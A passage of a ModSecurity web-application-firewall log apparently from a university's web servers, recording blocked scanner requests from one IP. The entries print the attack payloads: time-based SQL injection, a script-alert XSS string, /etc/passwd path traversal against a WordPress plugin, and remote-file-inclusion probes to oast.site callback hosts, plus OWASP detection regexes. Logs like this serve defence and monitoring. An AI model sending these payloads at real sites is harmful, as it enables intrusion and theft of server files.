'rogN'='rogN"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/admin/"] [unique_id "ZO122sCo-f0AAAcvBcAAAAAJ"]
[Tue Aug 29 11:40:58.381106 2023] [:error] [pid 1548] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  'rogN'='rogN found within ARGS:id: 1' AND (SELECT 7774 FROM (SELECT(SLEEP(6)))dPPt) AND 'rogN'='rogN"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/admin/"] [unique_id "ZO122sCo-f0AAAYMWS4AAAAR"]
[Tue Aug 29 11:40:58.396906 2023] [:error] [pid 1839] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:log. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:log: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/webadmin/reporter/view_server_log.php"] [unique_id "ZO122sCo-f0AAAcvBcEAAAAJ"]
[Tue Aug 29 11:40:58.415463 2023] [:error] [pid 1834] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:log. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:log: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/webadmin/reporter/view_server_log.php"] [unique_id "ZO122sCo-f0AAAcqJGMAAAAG"]
[Tue Aug 29 11:40:58.417276 2023] [:error] [pid 1839] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:log. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:log: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/webadmin/reporter/view_server_log.php"] [unique_id "ZO122sCo-f0AAAcvBcIAAAAJ"]
[Tue Aug 29 11:40:58.420141 2023] [:error] [pid 1689] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:log. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:log: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/webadmin/reporter/view_server_log.php"] [unique_id "ZO122sCo-f0AAAaZ9k8AAAAo"]
[Tue Aug 29 11:40:58.423215 2023] [:error] [pid 1816] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:pl. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:pl: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "ft.unla.ac.id"] [uri "/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php"] [unique_id "ZO122sCo-f0AAAcYU60AAAAp"]
[Tue Aug 29 11:40:58.437554 2023] [:error] [pid 1839] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:log. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:log: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/webadmin/reporter/view_server_log.php"] [unique_id "ZO122sCo-f0AAAcvBcMAAAAJ"]
[Tue Aug 29 11:40:58.463404 2023] [:error] [pid 1816] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:pl. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:pl: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "unla.ac.id"] [uri "/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php"] [unique_id "ZO122sCo-f0AAAcYU64AAAAp"]
[Tue Aug 29 11:40:58.463677 2023] [:error] [pid 1819] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:pl. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:pl: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "journal.unla.ac.id"] [uri "/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php"] [unique_id "ZO122sCo-f0AAAcbSBQAAAAv"]
[Tue Aug 29 11:40:58.482755 2023] [:error] [pid 1689] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:pl. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:pl: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "informatika.unla.ac.id"] [uri "/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php"] [unique_id "ZO122sCo-f0AAAaZ9lEAAAAo"]
[Tue Aug 29 11:40:59.354747 2023] [:error] [pid 1816] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://cjmnbitjmimt14dgn26gwxau4rra1pwgy.oast.site found within TX:1: cjmnbitjmimt14dgn26gwxau4rra1pwgy.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "ft.unla.ac.id"] [uri "/DnnImageHandler.ashx"] [unique_id "ZO1228Co-f0AAAcYU68AAAAp"]
[Tue Aug 29 11:40:59.358557 2023] [:error] [pid 1832] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://cjmnbitjmimt14dgn26g3599h6qc9qees.oast.site found within TX:1: cjmnbitjmimt14dgn26g3599h6qc9qees.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "informatika.unla.ac.id"] [uri "/DnnImageHandler.ashx"] [unique_id "ZO1228Co-f0AAAcoNNoAAAAF"]
[Tue Aug 29 11:40:59.359635 2023] [:error] [pid 1837] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:pl. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:pl: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php"] [unique_id "ZO1228Co-f0AAActbFYAAAAH"]
[Tue Aug 29 11:40:59.375408 2023] [:error] [pid 1567] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://cjmnbitjmimt14dgn26gdwoce8nj4m43h.oast.site found within TX:1: cjmnbitjmimt14dgn26gdwoce8nj4m43h.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "unla.ac.id"] [uri "/DnnImageHandler.ashx"] [unique_id "ZO1228Co-f0AAAYf-LYAAAAD"]
[Tue Aug 29 11:40:59.375450 2023] [:error] [pid 1819] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://cjmnbitjmimt14dgn26gkijx7szuuaxhm.oast.site found within TX:1: cjmnbitjmimt14dgn26gkijx7szuuaxhm.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "journal.unla.ac.id"] [uri "/DnnImageHandler.ashx"] [unique_id "ZO1228Co-f0AAAcbSBYAAAAv"]
[Tue Aug 29 11:40:59.376965 2023] [:error] [pid 1832] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://cjmnbitjmimt14dgn26gsnw36zmq799pw.oast.site found within TX:1: cjmnbitjmimt14dgn26gsnw36zmq799pw.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "pusatbahasa.unla.ac.id"] [uri "/DnnImageHandler.ashx"] [unique_id "ZO1228Co-f0AAAcoNNsAAAAF"]
[Tue Aug 29 11:40:59.397163 2023] [:error] [pid 1819] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  'rogN'='rogN found within ARGS:id: 1' AND (SELECT 7774 FROM (SELECT(SLEEP(6)))dPPt) AND 'rogN'='rogN"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/admin/"] [unique_id "ZO1228Co-f0AAAcbSBcAAAAv"]
[Tue Aug 29 11:40:59.415655 2023] [:error] [pid 1839] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:pl. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:pl: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "ft.unla.ac.id"] [uri "/wp-content/plugins/mail-masta/inc/lists/csvexport.php"] [unique_id "ZO1228Co-f0AAAcvBcgAAAAJ"]
[Tue Aug 29 11:40:59.431336 2023] [:error] [pid 1834] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:log. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:log: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/webadmin/reporter/view_server_log.php"] [unique_id "ZO1228Co-f0AAAcqJGoAAAAG"]
[Tue Aug 29 11:40:59.435546 2023] [:error] [pid 1816] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:pl. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:pl: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "journal.unla.ac.id"] [uri "/wp-content/plugins/mail-masta/inc/lists/csvexport.php"] [unique_id "ZO1228Co-f0AAAcYU7MAAAAp"]
[Tue Aug 29 11:40:59.436827 2023] [:error] [pid 1839] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:pl. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:pl: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "unla.ac.id"] [uri "/wp-content/plugins/mail-masta/inc/lists/csvexport.php"] [unique_id "ZO1228Co-f0AAAcvBckAAAAJ"]
[Tue Aug 29 11:40:59.437583 2023] [:error] [pid 1832] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:pl. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:pl: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "informatika.unla.ac.id"] [uri "/wp-content/plugins/mail-masta/inc/lists/csvexport.php"] [unique_id "ZO1228Co-f0AAAcoNN4AAAAF"]
[Tue Aug 29 11:41:00.361412 2023] [:error] [pid 1689] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../ found within ARGS:url: ../../../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/photoalbum/index.php"] [unique_id "ZO123MCo-f0AAAaZ9lYAAAAo"]
[Tue Aug 29 11:41:00.366495 2023] [:error] [pid 1841] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../ found within ARGS:url: ../../../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/photoalbum/index.php"] [unique_id "ZO123MCo-f0AAAcxbCYAAAAL"]
[Tue Aug 29 11:41:00.372069 2023] [:error] [pid 1837] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://cjmnbitjmimt14dgn26ggpzkkd66kpspr.oast.site found within TX:1: cjmnbitjmimt14dgn26ggpzkkd66kpspr.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "www.unla.ac.id"] [uri "/DnnImageHandler.ashx"] [unique_id "ZO123MCo-f0AAActbFgAAAAH"]
[Tue Aug 29 11:41:00.380122 2023] [:error] [pid 1567] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../ found within ARGS:url: ../../../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/photoalbum/index.php"] [unique_id "ZO123MCo-f0AAAYf-LoAAAAD"]
[Tue Aug 29 11:41:00.380781 2023] [:error] [pid 1832] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:file_name. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:file_name: ../etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "pusatbahasa.unla.ac.id"] [uri "/webui/"] [unique_id "ZO123MCo-f0AAAcoNOAAAAAF"]
